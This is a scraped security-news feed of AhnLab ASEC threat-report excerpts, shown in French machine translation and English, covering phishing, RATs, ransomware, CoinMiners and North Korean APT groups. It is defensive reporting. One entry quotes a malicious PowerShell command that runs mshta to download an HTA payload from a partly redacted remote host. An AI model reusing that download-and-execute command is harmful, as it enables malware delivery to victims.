Have you or anyone near you became a victim of online scamming? This article will introduce you to online scams, how the waves of scammers target their victims and in which ways, and what damage they inflict. This article’s contents are based on AhnLab’s in-house data as well as externally available information. When quoting external information, their sources have been cited. Contents What Are Online Scams? Scams vs. Frauds vs. Phishing How Bad Are They? What Are Their Goals? Who... ]]> 2024-03-04T05:08:16+00:00 https://asec.ahnlab.com/en/62410/ www.secnews.physaphae.fr/article.php?IdArticle=8458697 False None None 2.0000000000000000 AhnLab - Korean Security Firm l'année dernière, Ahnlab Security Intelligence Center (ASEC) a introduit des fichiers de script de phishing qui utilisaient Telegram pour divulguer des informations utilisateur[1].Récemment, plusieurs scripts de phishing utilisant Telegram sont distribués sans discrimination à travers des mots clés tels que les remises et les reçus.Contrairement aux fichiers de script de phishing qui ont été distribués au début, les derniers fichiers sont obscurcis pour éviter la détection.Semblable au passé, ils sont distribués en utilisant divers moyens et tactiques tels que inciter les utilisateurs à se connecter pour ouvrir des fichiers protégés ou ...

---

Last year, AhnLab SEcurity intelligence Center (ASEC) introduced phishing script files that used Telegram to leak user information [1]. Recently, several phishing scripts using Telegram are being distributed indiscriminately through keywords such as remittance and receipts. Unlike the phishing script files that were distributed in the early days, the latest files are obfuscated to avoid detection. Similar to the past, they are being distributed using various means and tactics such as prompting users to login to open protected files or... ]]> 2024-02-27T00:36:02+00:00 https://asec.ahnlab.com/en/62177/ www.secnews.physaphae.fr/article.php?IdArticle=8455644 False Malware None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert que Nood Rat était utilisé dans les attaques de logiciels malveillants.Nood Rat est une variante de GH0st Rat qui fonctionne dans Linux.Bien que le nombre de rats GH0ST pour Linux soit inférieur à celle du rat GH0ST pour Windows, les cas de rat GH0ST pour Linux sont collectés en continu.NOOD RAT est classé comme une variante du rat GH0ST en fonction de la similitude du code avec les codes précédents de Gh0st Rat [1].Un constructeur utilisé ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered that Nood RAT is being used in malware attacks. Nood RAT is a variant of Gh0st RAT that works in Linux. Although the number of Gh0st RAT for Linux is fewer compared to Gh0st RAT for Windows, the cases of Gh0st RAT for Linux are continuously being collected. Nood RAT is categorized as a variant of Gh0st RAT based on the code’s similarity with previous codes from Gh0st RAT [1]. A builder used... ]]> 2024-02-26T02:14:17+00:00 https://asec.ahnlab.com/en/62144/ www.secnews.physaphae.fr/article.php?IdArticle=8455190 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm Nos vies sont connectées au monde numérique qui nous fournit de nombreux services publics et divertissements, mais parfois il se présentenous avec des rencontres indésirables.Les fraudes et escroqueries en ligne sont des exemples de telles rencontres.Les vagues d'e-mails de spam publicitaires commerciaux que nous recevons ne sont pas très dérangeants, mais les escroqueries en ligne sont plutôt très sérieuses.L'escroquerie en ligne est une cybercriminalité grave qui inflige des dommages à long terme financièrement et psychologiquement, et laisse d'énormes cicatrices aux victimes & # 8217;vies.Lorsque les entreprises sont affectées ...

---

Our lives are connected to the digital world that provides us with numerous utilities and entertainment, but sometimes it presents us with undesirable encounters. Online frauds and scams are examples of such encounters. Waves of commercial advertisement spam emails we receive are not much of a bother, but online scams are rather very serious. Online scamming is a serious cybercrime that inflicts long-term damage both financially and psychologically, and leaves tremendous scars on the victims’ lives. When companies are affected... ]]> 2024-02-23T02:02:05+00:00 https://asec.ahnlab.com/en/61976/ www.secnews.physaphae.fr/article.php?IdArticle=8453922 False Spam,Commercial None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert que les souches de logiciels malveillants sont téléchargées dans des systèmes lorsque les utilisateurs essaient de téléchargerProgrammes de sécurité d'un site Web coréen lié à la construction.La connexion est nécessaire pour utiliser les services de site Web, et divers programmes de sécurité doivent être installés pour se connecter. Parmi les programmes qui doivent être installés pour la connexion, l'un des installateurs avait des souches de logiciels malveillants à l'intérieur.Lorsque l'utilisateur télécharge et installe le programme d'installation, les souches de logiciels malveillants sont également installées avec la sécurité ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered that malware strains are downloaded into systems when users try to download security programs from a Korean construction-related association’s website. Login is required to use the website’s services, and various security programs must be installed to log in. Among the programs that must be installed for login, one of the installers had malware strains inside. When the user downloads and installs the installer, the malware strains are also installed along with the security... ]]> 2024-02-23T00:28:12+00:00 https://asec.ahnlab.com/en/61934/ www.secnews.physaphae.fr/article.php?IdArticle=8453903 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm Kimsuky Threat Group, réputé soutenu par la Corée du Nord, est actif depuis 2013. Au début,Ils ont attaqué les instituts de recherche liés à la Corée du Nord en Corée du Sud avant d'attaquer une société énergétique sud-coréenne en 2014 et ont élargi leurs attaques à d'autres pays depuis 2017 [1].Le groupe a principalement attaqué la défense nationale, l'industrie de la défense, les médias, les organisations gouvernementales et les domaines universitaires pour leur voler des données et des technologies internes [2] (ce rapport ne soutient que coréen pour l'instant.) Le ...

---

Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014, and have expanded their attacks to other countries since 2017 [1]. The group has mainly been attacking the national defense, defense industry, media, government organizations, and academic areas to steal internal data and technologies from them [2] (This report supports Korean only for now.) The... ]]> 2024-02-14T01:05:56+00:00 https://asec.ahnlab.com/en/61631/ www.secnews.physaphae.fr/article.php?IdArticle=8449788 False Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert la distribution des logiciels malveillants de Revenge Rat qui avaient été développés en fonction deOutils légitimes.Il semble que les attaquants aient utilisé des outils tels que & # 8216; SMTP-Validator & # 8217;et & # 8216; e-mail à SMS & # 8217;.Au moment de l'exécution, le logiciel malveillant crée et exécute à la fois un outil légitime et un fichier malveillant, ce qui rend difficile pour les utilisateurs de réaliser qu'une activité malveillante s'est produite.Comme indiqué dans le code ci-dessous, l'acteur de menace crée et exécute setup.exe ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of Revenge RAT malware that had been developed based on legitimate tools. It appears that the attackers have used tools such as ‘smtp-validator’ and ‘Email To Sms’. At the time of execution, the malware creates and runs both a legitimate tool and a malicious file, making it difficult for users to realize that a malicious activity has occurred. As shown in the code below, the threat actor creates and runs Setup.exe... ]]> 2024-02-13T03:52:20+00:00 https://asec.ahnlab.com/en/61584/ www.secnews.physaphae.fr/article.php?IdArticle=8449455 False Malware,Tool,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a précédemment téléchargé l'article «Blueshell utilisé dans les attaques appropriées contre le coréen et le thaïlandaisCibles »[1] sur le blog ASEC qui a introduit des souches de logiciels malveillants Blueshell qui ont été utilisés contre les systèmes Linux en Thaïlande et en Corée.L'acteur de menace a personnalisé le malware BlueShell Backdoor pour leur attaque et a configuré la condition de fonctionnement des logiciels malveillants pour travailler uniquement dans des systèmes spécifiques.Même après la sortie de l'article, les souches de logiciels malveillants Blueshell développées par le même acteur de menace sont collectées en continu ...

---

AhnLab SEcurity intelligence Center (ASEC) previously uploaded the article “BlueShell Used in APT Attacks Against Korean and Thai Targets” [1] on the ASEC blog which introduced BlueShell malware strains that were used against Linux systems in Thailand and Korea. The threat actor customized the BlueShell backdoor malware for their attack, and configured the malware’s operating condition to only work in specific systems. Even after the article’s release, the BlueShell malware strains developed by the same threat actor are being continuously collected... ]]> 2024-02-08T08:00:40+00:00 https://asec.ahnlab.com/en/61549/ www.secnews.physaphae.fr/article.php?IdArticle=8447921 False Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-relateddéposer.Comme la méthode de distribution de Venomrat introduit le mois dernier ([1]), le malware est réparti via un fichier de raccourci (.lnk), et il télécharge le rat directement depuis HTA.Le fichier de raccourci distribué contient une commande PowerShell malveillante qui exécute MSHTA et télécharge le script malveillant.Commande PowerShell C: \ Windows \ System32 \ Windowspowershell \ V1.0 \ PowerShell.exe.$ Env: C: \ W * \ S * 2 \ M * H? A. * \\ 'hxxp: //193.***.*** [.] 253: 7287 / 2.hta.hta \\«Les URL malveillantes dans le fichier de raccourci confirmé sont les suivantes: hxxp: //193.***.*** [.] 253: 7287 / 2.hta.hta ...

---

AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA. The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script. PowerShell command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  \'hxxp://193.***.***[.]253:7287/2.hta.hta\' The malicious URLs in the confirmed shortcut file are as follows: hxxp://193.***.***[.]253:7287/2.hta.hta... ]]> 2024-02-07T01:59:51+00:00 https://asec.ahnlab.com/en/61335/ www.secnews.physaphae.fr/article.php?IdArticle=8447482 False Malware None 3.0000000000000000 AhnLab - Korean Security Firm Les acteurs de la menace de ransomware ont extorqué de l'argent après avoir pris le contrôle des organisations & # 8217;Réseaux internes, distribution des ransomwares, chiffrer les systèmes et maintenir la restauration du système pour rançon.Récemment, cependant, les acteurs de la menace cryptent non seulement les systèmes mais divulguent également des données internes et menacent de les exposer publiquement si la rançon n'est pas payée.Habituellement, ces acteurs de menace collectent des données, les compriment et les divulguent publiquement.Dans de tels processus, les acteurs de la menace utilisent de nombreux programmes d'utilité légitimes.Ces programmes permettent déjà un transfert stable de grande taille ...

---

Ransomware threat actors have been extorting money after taking control over organizations’ internal networks, distributing ransomware, encrypting systems, and holding system restoration for ransom. Recently, however, threat actors not only encrypts the systems but also leaks internal data and threatens to expose them publicly if the ransom is not paid. Usually, these threat actors collect data, compress them, and leak them publicly. In such processes, threat actors utilize many legitimate utility programs. These programs already allow stable transfer of large-sized... ]]> 2024-02-07T01:43:06+00:00 https://asec.ahnlab.com/en/61480/ www.secnews.physaphae.fr/article.php?IdArticle=8447483 False Ransomware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm AhnLab Security Intelligence Center (ASEC) utilise un pot de miel Linux SSH pour surveiller les attaques contre les systèmes Linux non spécifiés.Les acteurs de la menace installent des logiciels malveillants en lançant des attaques de force brute et du dictionnaire contre les systèmes Linux qui sont mal gérés, tels que l'utilisation de paramètres par défaut ou le mot de passe simple.Bien qu'il existe une variété de cas d'attaque, y compris ceux où les vers, les co -miners et les robots DDOS sont installés, ce message couvrira les cas d'attaque où des comptes de porte dérobée sont créés à la place des logiciels malveillants.De telles attaques ...

---

AhnLab SEcurity intelligence Center (ASEC) is using a Linux SSH honeypot to monitor attacks against unspecified Linux systems. Threat actors install malware by launching brute force and dictionary attacks against Linux systems that are poorly managed, such as using default settings or having a simple password. While there is a variety of attack cases including those where worms, CoinMiners, and DDoS bots are installed, this post will cover attack cases where backdoor accounts are created instead of malware. Such attacks... ]]> 2024-02-02T08:27:49+00:00 https://asec.ahnlab.com/en/61185/ www.secnews.physaphae.fr/article.php?IdArticle=8445887 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of Qshing emails impersonating the Ministry of Finance ofLa République de Chine du peuple.Qshing est un nom composé des mots & # 8220; code QR & # 8221;et & # 8220; phishing & # 8221;Cela conduit à une application malveillante installée ou dirige les utilisateurs vers un site de phishing lorsqu'un code QR est analysé.L'e-mail en cours de distribution est illustré à la figure 1 et est déguisé en confirmation de réception de chèque de paie pour le premier trimestre de 2024 ....

---

AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of Qshing emails impersonating the Ministry of Finance of the People’s Republic of China. Qshing is a compound noun from the words “QR code” and “Phishing” that leads to a malicious app being installed or directs users to a phishing site when a QR code is scanned. The email being distributed is shown in Figure 1 and is disguised as a paycheck receipt confirmation for the first quarter of 2024.... ]]> 2024-02-02T05:22:00+00:00 https://asec.ahnlab.com/en/61104/ www.secnews.physaphae.fr/article.php?IdArticle=8445846 False None None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment analysé un cas de phishing où une page de phishing a été déguisée en tant quePage de connexion d'un célèbre site Web de portail coréen.L'ASEC a ensuite collecté des informations sur l'acteur de menace.La fausse page de connexion, qui aurait été distribuée sous le format des hyperliens jointe aux e-mails de phishing, s'est révélée très similaire à la page de connexion du célèbre site de portail.En fait, il est difficile de réaliser que ...

---

AhnLab SEcurity intelligence Center (ASEC) has recently analyzed a phishing case where a phishing page was disguised as a login page of a famous Korean portal website. ASEC has then collected some information on the threat actor. The fake login page, which is believed to have been distributed in the format of hyperlinks attached to phishing emails, was found to be very similar to the login page of the famous portal site. In fact, it is difficult to realize that... ]]> 2024-02-02T05:00:28+00:00 https://asec.ahnlab.com/en/61130/ www.secnews.physaphae.fr/article.php?IdArticle=8445830 False Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert qu'un Coinmin, ciblant Zephyr est distribué.Le fichier est créé avec AutOIT, et il est réparti sous la forme d'un fichier compressé qui contient le Coinmin.Le fichier compressé est distribué sous le nom de «Windows_Py_M3U_EXPLOIT_2024.7Z», et en décompressant le fichier, plusieurs scripts et exécutables sont créés.Parmi eux, «comboiptvexploit.exe» se trouve un programme d'installation de système d'installation scriptable Nullsoft (NSIS), et deux fichiers JavaScript existent.Lorsque le fichier est exécuté, il ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered that a CoinMiner targeting Zephyr is being distributed. The file is created with Autoit, and it is being spread in the form of a compressed file that contains the CoinMiner. The compressed file is being distributed as “WINDOWS_PY_M3U_EXPLOIT_2024.7z,” and upon decompressing the file, several scripts and executables are created. Among them, “ComboIptvExploit.exe” is a Nullsoft Scriptable Install System (NSIS) installer, and two Javascript files exist within it. When the file is run, it... ]]> 2024-02-02T04:20:46+00:00 https://asec.ahnlab.com/en/61164/ www.secnews.physaphae.fr/article.php?IdArticle=8445831 False Threat None 3.0000000000000000 AhnLab - Korean Security Firm Les utilisateurs utilisent fréquemment la commodité des fonctionnalités de connexion automatique fournies par des programmes tels que les navigateurs Web, les clients de messagerie, etClients FTP.Cependant, cette commodité a un coût car chacun de ces programmes stocke les informations d'identification du compte utilisateur dans leurs données de paramètres.En dépit d'être une fonctionnalité pratique, il présente également un risque de sécurité parce que les acteurs de menaces malveillants sont en mesure de fuir les utilisateurs & # 8217;Compte les informations d'identification facilement.Si les acteurs de malware ou de menace prennent le contrôle d'un système infecté, ils peuvent utiliser divers ...

---

Users frequently utilize the convenience of automatic log in features provided by programs like web browsers, email clients, and FTP clients. However, this convenience comes at a cost as each of these programs stores user account credentials within their settings data. Despite being a convenient feature, it also poses a security risk because malicious threat actors are able to leak the users’ account credentials easily. If malware or threat actors gain control of an infected system, they can employ various... ]]> 2024-02-01T02:20:55+00:00 https://asec.ahnlab.com/en/61082/ www.secnews.physaphae.fr/article.php?IdArticle=8445400 False Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment identifié une nouvelle activité de l'acteur de menace de ransomware Trigona Installation de Mimicransomware.Comme les cas passés, l'attaque récemment détectée cible les serveurs MS-SQL et est remarquable pour abuser de l'utilitaire BCP (Bulk Copy Program) dans les serveurs MS-SQL pendant le processus d'installation de logiciels malveillants.L'ASEC a découvert un cas d'attaque pour la première fois en utilisant BCP pour installer Mimic début janvier 2024. À la mi-janvier 2024, des types d'attaques similaires étaient identifiés où Trigona a été installé à la place ...

---

AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for abusing the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process. ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead... ]]> 2024-01-30T05:20:34+00:00 https://asec.ahnlab.com/en/61000/ www.secnews.physaphae.fr/article.php?IdArticle=8444657 False Ransomware,Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment constaté que XMRG Coinmineur est distribué par le biais de hacks de jeux.Le processus est similaire aux cas précédemment couverts où les plates-formes de partage de fichiers ont été utilisées pour distribuer XMRIG Coinmin [1] [2].1. Channel de distribution Le canal de distribution de Coinmin & # 8217; s'est avéré être un site Web qui distribue des hacks de jeux pour des jeux célèbres.Sur ce site Web, plusieurs fichiers compressés déguisés en hacks pour les jeux célèbres sont téléchargés.Afin d'empêcher le téléchargement d'être bloqué par les navigateurs et ...

---

AhnLab SEcurity intelligence Center (ASEC) recently found that XMRig CoinMiner is being distributed through game hacks. The process is similar to previously covered cases where file-sharing platforms were used to distribute XMRig CoinMiner [1] [2]. 1. Distribution Channel The CoinMiner’s distribution channel was found to be a website that distributes game hacks for famous games. On this website, multiple compressed files disguised as hacks for famous games are uploaded. In order to prevent the download from being blocked by browsers and... ]]> 2024-01-25T00:07:57+00:00 https://asec.ahnlab.com/en/60845/ www.secnews.physaphae.fr/article.php?IdArticle=8442752 False None None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a trouvé un fichier de raccourci (.lnk) qui télécharge Asyncrat (Venomrat).Pour que le fichier LNK se déguise en fichier Word normal, il a été distribué avec le nom & # 8216; Survey.docx.lnk & # 8217;à l'intérieur d'un fichier compressé qui contenait également un fichier texte normal.Surtout, les utilisateurs doivent rester vigilants, car le fichier exécutable (blues.exe) utilisé dans l'attaque est déguisé en certificat coréen.Le processus de fonctionnement global du malware est comme indiqué ci-dessous ....

---

AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a normal Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a normal text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate. The overall operation process of the malware is as shown below.... ]]> 2024-01-24T00:03:25+00:00 https://asec.ahnlab.com/en/60805/ www.secnews.physaphae.fr/article.php?IdArticle=8442317 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm à travers le groupe & # 8220; Lazarus utilise la technique de chargement latéral DLL & # 8221;[1] Article de blog, Ahnlab Security Intelligence Center (ASEC) a précédemment couvert comment le groupe Lazare a utilisé la technique d'attaque de chargement de chargement DLL en utilisant des applications légitimes au stade d'accès initial pour atteindre la prochaine étape de leur processus d'attaque.Ce billet de blog couvrira les variantes de DLL ajoutées et leur routine de vérification pour les cibles.Le groupe Lazare est un groupe approprié qui cible les entreprises sud-coréennes, les institutions, les groupes de réflexion et autres.Sur ...

---

Through the “Lazarus Group Uses the DLL Side-Loading Technique” [1] blog post, AhnLab SEcurity intelligence Center(ASEC) has previously covered how the Lazarus group used the DLL side-loading attack technique using legitimate applications in the initial access stage to achieve the next stage of their attack process. This blog post will cover the added DLL variants and their verification routine for the targets. The Lazarus group is an APT group that targets South Korean companies, institutions, think tanks, and others. On... ]]> 2024-01-23T00:40:00+00:00 https://asec.ahnlab.com/en/60792/ www.secnews.physaphae.fr/article.php?IdArticle=8441897 False None APT 38 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a publié le blog «Les informations d'identification du compte dans les environnements de domaine détectés par EDR»[1] qui discute des attaquants volant des informations d'identification de compte après avoir dominé le système dans un environnement Active Directory.Parmi la méthode de vol d'identification du compte, il couvrira en détail les différentes techniques de vidage du hachage NT (un hachage utilisé pour le protocole d'authentification NTLM) enregistré dans la mémoire de processus LSASS.L'identification du compte est enregistrée dans la mémoire du processus LSASS.L'attaquant jette le processus ...

---

AhnLab SEcurity intelligence Center (ASEC) has posted the blog “Account Credentials Theft in Domain Environments Detected by EDR” [1] that discusses attackers stealing account credentials after dominating the system in an Active Directory environment.  Among the account credential theft method, it will cover in detail the various techniques of dumping NT Hash (a hash used for NTLM authentication protocol) saved in the LSASS process memory. The account credential is saved in the LSASS process memory. The attacker dumps the process... ]]> 2024-01-22T00:50:37+00:00 https://asec.ahnlab.com/en/60690/ www.secnews.physaphae.fr/article.php?IdArticle=8441451 False None None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a découvert que plusieurs souches de malware smokeloder sont distribuées au gouvernement ukrainien etentreprises.Il semble que le nombre d'attaques ciblant l'Ukraine ait récemment augmenté.Les objectifs confirmés jusqu'à présent comprennent le ministère ukrainien de la Justice, les institutions publiques, les compagnies d'assurance, les institutions médicales, les entreprises de construction et les entreprises de fabrication.L'e-mail distribué suit le format illustré à la figure 1 écrite en ukrainien.Le corps comprenait des informations liées à une facture, incitant le lecteur à exécuter ...

---

AhnLab SEcurity intelligence Center (ASEC) discovered that multiple SmokeLoader malware strains are being distributed to the Ukrainian Government and companies. It seems that the number of attacks targeting Ukraine has increased recently. The targets confirmed so far include the Ukrainian Department of Justice, public institutions, insurance companies, medical institutions, construction companies, and manufacturing companies. The distributed email follows the format shown in Figure 1 written in Ukrainian. The body included information related to an invoice, prompting the reader to execute... ]]> 2024-01-19T00:32:31+00:00 https://asec.ahnlab.com/en/60703/ www.secnews.physaphae.fr/article.php?IdArticle=8441452 False Malware,Medical None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a identifié que les ransomwares de verrouillage sont distribués via des fichiers de mots depuis le mois dernier le mois dernier.Un point notable est que le ransomware de verrouillage est généralement distribué en se déguisant en curriculum vitae et que les fichiers de mots malveillants récemment ont également été déguisés en curriculum vitae [1].La méthode de distribution des ransomwares de verrouillage à l'aide d'URL externes dans les fichiers Word a été trouvée pour la première fois en 2022 [2].Les noms de fichiers récemment découverts des fichiers Word malveillants sont les suivants.& # 160;Nom de fichier [[[231227_YANG **]]]. Docx ...

---

AhnLab SEcurity intelligence Center (ASEC) has identified that LockBit ransomware is being distributed via Word files since last month. A notable point is that the LockBit ransomware is usually distributed by disguising itself as resumes, and recently found malicious Word files were also disguised as resumes [1]. The distribution method of LockBit ransomware using external URLs in Word files was first found in 2022 [2]. The recently discovered file names of malicious Word files are as follows.   File name [[[231227_Yang**]]].docx... ]]> 2024-01-18T07:31:53+00:00 https://asec.ahnlab.com/en/60633/ www.secnews.physaphae.fr/article.php?IdArticle=8440172 False Ransomware None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment observé les circonstances d'un acteur de menace de Coinmin appelé MIMO exploitant diverses vulnérabilités àinstaller des logiciels malveillants.MIMO, également surnommé HEZB, a été retrouvé pour la première fois lorsqu'ils ont installé des co -miners grâce à une exploitation de vulnérabilité Log4Shell en mars 2022. Jusqu'à présent, tous les cas d'attaque impliquaient l'installation de XMRIG Coinmin, appelé MIMO Miner Bot dans l'étape finale.Cependant, il y avait d'autres cas pertinents où le même acteur de menace a installé Mimus Ransomware, Proxyware et Reverse Shell ...

---

AhnLab SEcurity intelligence Center (ASEC) recently observed circumstances of a CoinMiner threat actor called Mimo exploiting various vulnerabilities to install malware. Mimo, also dubbed Hezb, was first found when they installed CoinMiners through a Log4Shell vulnerability exploitation in March 2022. Up until now, all of the attack cases involved the installation of XMRig CoinMiner called Mimo Miner Bot in the final stage. However, there were other pertinent cases where the same threat actor installed Mimus ransomware, proxyware, and reverse shell... ]]> 2024-01-18T07:10:53+00:00 https://asec.ahnlab.com/en/60440/ www.secnews.physaphae.fr/article.php?IdArticle=8440173 False Ransomware,Malware,Vulnerability,Threat None 3.0000000000000000 AhnLab - Korean Security Firm tout en surveillant les sources de distribution de logiciels malveillants en Corée du Sud, Ahnlab Security Intelligence Center (ASEC) a récemment découvert queLe malware Remcos Rat déguisé en jeux pour adultes est distribué via des webards.Les webards et les torrents sont des plateformes couramment utilisées pour la distribution des logiciels malveillants en Corée.Les attaquants utilisent normalement des logiciels malveillants facilement disponibles tels que NJRAT et UDP RAT, et les déguisent en programmes légitimes tels que des jeux ou du contenu pour adultes pour la distribution.Des cas similaires ont été introduits dans les blogs ASEC précédents ...

---

While monitoring the distribution sources of malware in South Korea, AhnLab SEcurity intelligence Center (ASEC) recently found that the Remcos RAT malware disguised as adult games is being distributed via webhards. Webhards and torrents are platforms commonly used for the distribution of malware in Korea. Attackers normally use easily obtainable malware such as njRAT and UDP RAT, and disguise them as legitimate programs such as games or adult content for distribution. Similar cases were introduced in the previous ASEC blogs... ]]> 2024-01-14T22:53:23+00:00 https://asec.ahnlab.com/en/60270/ www.secnews.physaphae.fr/article.php?IdArticle=8439029 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm «Reconnaissance interne dans les environnements de domaine détecté par EDR» [1] Couvrait des cas où l'EDR a été utiliséDétecter le processus d'un acteur de menace qui reprend un système dans un environnement Active Directory avant de mener une reconnaissance interne pour collecter des informations.Si l'infrastructure d'une organisation est un environnement qui utilise Active Directory, l'acteur de menace peut effectuer une reconnaissance interne pour collecter des informations sur l'environnement du domaine, voler des informations d'identification, les utiliser pour un mouvement latéral et, finalement, prendre le contrôle du ...

---

The “Internal Reconnaissance in Domain Environments Detected by EDR” [1] post covered cases where EDR was used to detect the process of a threat actor taking over a system in an Active Directory environment before conducting internal reconnaissance to collect information. If an organization\'s infrastructure is an environment that uses Active Directory, the threat actor can perform internal reconnaissance to collect information on the domain environment, steal account credentials, use these for lateral movement, and ultimately seize control over the... ]]> 2024-01-09T05:14:39+00:00 https://asec.ahnlab.com/en/60225/ www.secnews.physaphae.fr/article.php?IdArticle=8436988 False Threat None 2.0000000000000000 AhnLab - Korean Security Firm Alors que les acteurs de la menace peuvent augmenter les bénéfices en installant des co -miners ouUn logiciel malveillant de porte dérobée ou de rat pour prendre le contrôle du système infecté.Les infostelleurs sont utilisés dans le but de voler des informations sur les utilisateurs dans le système, mais parfois, ils sont utilisés pour obtenir des données qui peuvent être utilisées pour prendre le contrôle du système cible afin d'installer finalement des co -miners ou des ransomwares.Cela peut ne pas être important si l'attaque cible ...

---

While threat actors can raise a profit by installing CoinMiners or ransomware strains after initial access, they often first install a backdoor or RAT malware to seize control over the infected system. Infostealers are used for the purpose of stealing user information in the system, but sometimes, they are used to obtain data that can be utilized in gaining control over the target system to ultimately install CoinMiners or ransomware. This may not be of significance if the attack target... ]]> 2024-01-02T23:46:43+00:00 https://asec.ahnlab.com/en/60106/ www.secnews.physaphae.fr/article.php?IdArticle=8433258 False Ransomware,Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm connu pour être soutenu par la Corée du Nord, le groupe de menaces Kimsuky est actif depuis 2013. Au début,Ils ont attaqué les instituts de recherche liés à la Corée du Nord en Corée du Sud avant d'attaquer une société sud-coréenne de l'énergie en 2014. Depuis 2017, des attaques ciblant des pays autres que la Corée du Sud ont également été observées.[1] Le groupe lance généralement des attaques de phishing de lance contre la défense nationale, les industries de la défense, les médias, la diplomatie, les organisations nationales et les secteurs universitaires.Leurs attaques visent à voler des informations internes et des technologies auprès des organisations.[2] tandis que ...

---

Known to be supported by North Korea, the Kimsuky threat group has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014. Since 2017, attacks targeting countries other than South Korea have also been observed. [1] The group usually launches spear phishing attacks against national defense, defense industries, media, diplomacy, national organizations, and academic sectors. Their attacks aim to steal internal information and technology from organizations. [2] While... ]]> 2023-12-28T05:17:46+00:00 https://asec.ahnlab.com/en/60054/ www.secnews.physaphae.fr/article.php?IdArticle=8430132 False Threat,Prediction None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) analyse les campagnes d'attaque contre les serveurs Linux SSH mal gérés et partage les résultatsSur le blog ASEC.Avant d'installer des logiciels malveillants tels que DDOS Bot et Coinmin, les acteurs de la menace doivent obtenir des informations sur l'objectif d'attaque, à savoir l'adresse IP et les informations d'identification du compte SSH.La numérisation IP est effectuée à cet effet pour rechercher des serveurs avec le service SSH, ou le port 22 activé, après quoi une force brute ou une attaque de dictionnaire est ...

---

AhnLab Security Emergency response Center (ASEC) analyzes attack campaigns against poorly managed Linux SSH servers and shares the results on the ASEC Blog. Before installing malware such as DDoS bot and CoinMiner, the threat actors need to obtain information on the attack target, that is the IP address and SSH account credentials. IP scanning is performed for this purpose to look for servers with the SSH service, or port 22 activated, after which a brute force or dictionary attack is... ]]> 2023-12-26T01:30:39+00:00 https://asec.ahnlab.com/en/59972/ www.secnews.physaphae.fr/article.php?IdArticle=8429066 False Malware,Threat None 3.0000000000000000 AhnLab - Korean Security Firm En novembre 2023, Ahnlab Security Emergency Response Center (ASEC) a publié un article de blog intitulé & # 8220;Circonstances du groupe Andariel exploitant une vulnérabilité Apache ActiveMQ (CVE-2023-46604) & # 8221;[1] qui a couvert les cas du groupe de menaces Andariel exploitant la vulnérabilité CVE-2023-46604 pour installer des logiciels malveillants.Ce message a non seulement couvert les cas d'attaque du groupe Andariel, mais aussi ceux de Hellokitty Ransomware, de Cobalt Strike et Metasploit Meterpreter.Depuis lors, la vulnérabilité Apache ActiveMQ (CVE-2023-46604) a continué à être exploitée par divers acteurs de menace.Ce ...

---

